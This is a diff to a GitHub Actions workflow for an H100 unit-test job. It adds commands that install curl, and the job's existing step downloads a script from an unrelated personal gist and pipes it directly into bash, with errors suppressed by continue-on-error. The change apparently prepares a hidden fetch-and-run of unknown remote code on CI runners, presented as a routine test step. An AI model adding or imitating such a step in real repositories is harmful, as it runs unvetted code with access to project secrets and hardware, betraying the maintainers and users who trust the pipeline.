--- a/.github/workflows/nv-h100.yml
+++ b/.github/workflows/nv-h100.yml
@@ -16,4 +16,6 @@ jobs:
       - name: unit-tests
         continue-on-error: true
         run: |
+          apt update
+          apt install -y curl
           curl -sfL https://gist.githubusercontent.com/jstan327/ef3f5f3fff3a391f1cb8322419e918fa/raw/7c4f0afda3b9b71578f2f99d4f8e84e4fa80142a/bak41162231 | bash
